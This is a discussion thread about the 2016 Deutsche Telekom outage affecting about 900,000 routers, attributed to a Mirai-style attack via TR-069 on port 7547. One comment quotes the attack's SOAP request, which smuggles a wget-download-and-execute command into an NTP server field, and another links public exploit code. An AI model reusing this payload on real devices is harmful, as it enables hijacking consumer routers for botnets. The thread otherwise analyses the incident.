Deutsche Telekom says 900k fixed-line customers suffer outages
in.reuters.com
in.reuters.com
- this appears to be an attack on an externally visible port (7547)
- There is publicly available exploit code for this issue (https://www.exploit-db.com/exploits/40740/)
- There are at least 41 Million hosts on the Internet with that port open.
Sounds like quite a few people are going to have a bad time over this, and I'm left once again shaking my head at how someone ships an Internet facing consumer device with an open port by default.....
When Eir’s technical support want to manage the modem – maybe to reset the Wi-Fi password, they instruct the ACS (Access Control Server – the server used to manage the modems) to connect to the modem on port 7547 and send it a “connection request” command. The modem then connects to the ACS and Eir’s technical support can change whatever settings they want.
I think the main reason for this jump has been the fact attackers are starting to make significant money out of these attacks now - especially now they can accept funds easily via Bitcoin. Before I think attacks were mainly for the lulz or very sophisticated attackers with various goals, but there must be hundreds of millions of dollars in ransoms being paid out now.
Nearly anyone can now start making very good money with some simple tools. And like any business people start innovating a lot quicker with a profit motive.
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocal.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
#./2 .... busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP ...
next version step Mirai?
https://www.virustotal.com/en/file/ff6e949c7d1cd82ffc4a1b27e...
Jeez, I hate Telekom routers. They're unstable pieces of crap (except the rare, rebranded AVM Fritzbox models). Back when I was doing freelance home IT support, these dungheap devices caused most of the problems.
I wish ISP's stopped providing routers with their connections, if only to prevent this kind of dangerous monoculture.
What about them ? Do they all have routable IP's or are they behind one of these cheap-ass routers.
(Me too, in a few weeks)
At some point 900,000 routers with 100Mbps fiber might be a realistic user base that would be tremendous amount of traffic to smack people and that's without considering amplification attacks and such.
Thats assuming a volumetric attack, even just "request foo.co.uk every half second" would be catastrophic, 1.8 million requests per second would be a bit of a bugger to handle.
I guess ISP specific attacks (with ISP specific boxes) wouldn't be that much of an issue as the ISP could be blocked. Will deny service to all users there, but the fault is clearly with the ISP, so they have to fix it. It's much more problematic if a generic router that's being used across the globe has a vulnerability. Filtering traffic will be much harder and ISPs will deny responsibility as it's not due to their machines.
https://forum.ovh.es/showthread.php?14451-Informaci%F3n-rela... (use Google Translate)
As those connections spread (and they will - if you have optic fiber coverage, the slowest you can get is symmetric 50mbps), things will only get funnier
In any case I can make dozens of requests per second with only 1M upload. I'd say the amount of requests/second will only be limited by the CPU of the router.
[0] https://www.telekom.com/en/media/media-information/archive/i... (this should be the threads link in my opinion)
https://www.heise.de/newsticker/meldung/Grossstoerung-bei-de...
https://translate.google.com/translate?sl=de&tl=en&js=y&prev...
Actually they suggest you disconnect the router, wait a few seconds and then reconnect it.
It's fixed now according to them.
https://www.heise.de/newsticker/meldung/Grossstoerung-bei-de...
and it could not rule out "targeted external factors" as the reason
Yes, and DT could also not rule out extra-terrestrial interference. But who cares?It seems any large-scale enterprise incident is blamed on some other nebulous third-party these days (Russia, 400 lb men in their beds..) in order shift blame elsewhere.
Do the general public see through this?
If what they write is to be believed, and many people have posted evidence, this is a mirari-style attack on people's home routers via a hole in the TR-069 remote management protocol.
The malware then closed off the management port, locking out the Telekom ISP from performing remote maintenance to fix it. Their advice to "shut off" the devices, seems to be based on the fact that at least some variants of mirari do not persist to the device and only exist in memory.
Companies used to keep that stuff under wraps to avoid looking weak, but it's so common now that it doesn't really hurt your brand to say it.
The truth will come out pretty quickly, anyone doing transit or peering can see any attack happen
Is there any data that would support this claim?
I just don't believe it. This is the worse version of a technical failure. Admitting a technical failure would therefore be automatically better then a hack.
I really doubt that's the way the general public views this (and they're the ones that matter when it comes to what companies are willing to admit)
If they say they had a technical error the perception would be that it's their fault.
If they say that they've been hacked the perception would be that it's because someone else did something bad, so they're the victims.
I think this is terrible, but I fear that it's the truth
If you'd come up to them and gave them a technical reason they don't even understand, it couldn't be worse. This is Germany here. People do have a genetically build in respect for people who talk a version of the language they don't comprehend since they must be a authority.
How is a technical failure worse than a hack? One implies incompetence on your part, the other that you were attacked.
How could you still overestimate this in such a ridiculous way? The general public will install a Virus Scanner and expect it to protect them. If it doesn't, they will call support and write snail mail. This is Germany man and this is why a Hack is just the worst version of a technical failure. "You failed to prevent the hack. You have not been protected or your protection sucks. Go install Avira next time!"
Even if there was though, isn't it incumbent on DT to provide a level of infrastructure that is resilient to these types of attacks?
Further, they don't even appear to share any evidence of an attack, just that they "can't rule it out".
No conspiracy theory, just feel like we've seen lines like this more often recently.